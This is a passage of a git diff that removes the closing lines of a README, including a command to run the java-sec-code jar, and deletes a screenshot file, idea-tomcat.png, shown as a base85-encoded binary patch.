-java -jar target/java-sec-code-1.0.0.jar
-```
\ No newline at end of file
diff --git a/idea-tomcat.png b/idea-tomcat.png
deleted file mode 100644
index 5d0504f4587800ab1d63de656139f15edad5b96a..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 38151
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
